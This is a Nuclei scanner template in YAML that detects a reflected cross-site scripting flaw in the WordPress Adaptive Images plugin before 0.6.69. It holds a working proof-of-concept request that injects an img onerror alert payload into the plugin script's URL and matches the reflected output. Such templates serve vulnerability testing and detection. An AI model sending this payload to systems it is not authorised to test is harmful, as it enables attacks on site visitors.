nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml

27 lines
748 B
YAML

id: wp-adaptive-xss
info:
name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
tags: tags
requests:
- raw:
- |+
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- <img/src/onerror=alert("document.domain")>
- type: status
status:
- 200